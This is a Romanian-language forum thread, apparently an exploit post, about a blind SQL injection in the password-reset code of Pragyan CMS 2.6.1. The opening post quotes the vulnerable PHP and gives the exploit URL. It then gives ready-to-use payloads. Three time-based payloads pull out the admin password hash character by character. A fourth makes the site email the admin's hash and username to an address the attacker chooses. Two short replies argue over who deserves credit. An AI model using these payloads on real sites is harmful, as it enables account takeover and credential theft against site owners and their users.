Pragyan CMS 2.6.1 Blind SQL Injection

[vladiii]

In /cms/login.lib:

$key = $_GET['key'];
$user_email = $_GET['resetPasswd'];
$password = rand();
$dbpassword = md5($password);
$query = "SELECT * FROM `" . MYSQL_DATABASE_PREFIX . "users` WHERE `user_email`='" . $user_email . "'";
$result = mysql_query($query);

Datorita .htaccess, linkul cu parametrul vulnerabil va fi:

[url]http://site.xxx/home/+login&subaction=resetPasswd&key=asd&resetPasswd=[/url][SQL]

[SQL1] = ' UNION SELECT IF (SUBSTRING(user_password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8 from pragyanV2_users where user_email='adresadeemail@mail.com

[SQL2] = ' UNION SELECT IF (SUBSTRING(user_password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8 from pragyanV2_users where user_id='1

[SQL3] = ' UNION SELECT IF (SUBSTRING(user_password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8 from pragyanV2_users where user_name='admin

[SQL 4 - versiune sysgh0st [inovatie !]] = ' UNION ALL SELECT 1,2,CONCAT('mail@mail.com;',(SELECT `user_password` FROM `pragyanv2_users` WHERE `user_id`=1),'@',(SELECT `user_name` FROM `pragyanv2_users` WHERE `user_id`=1),'.org'),4,5,6,7,8#
Aceasta trimite parola pe email !

NOTA ! Sintaxa functioneaza doar daca magic_quotes_gpc sunt off in php.ini ! In .htaccess avem:

##Enable magic quotes in PHP, in case it is turned off in php.ini
php_flag magic_quotes_gpc on

Pe un apache acea comanda poate provoca eroare 500 (datorita php_flag) (sunt cazuri in care .htaccess este scos sau chiar sters) si userul (evident ! ) va elimina php_flag_blabla ! Deci conditiile finale ar fi magic_quotes_gpc = off.

Bafta !

[moubik]

nu e nici o inovatie concatenarea de selecturi sau selecturile in selecturi :PP

inseamna sa stii sql asa cum trebuie stiut

[moubik]

si in plus nu zici pe cine ai intrebat cat timp ai facut injectu asta

[vladiii]

si in plus nu zici pe cine ai intrebat cat timp ai facut injectu asta

Pe tine, great king !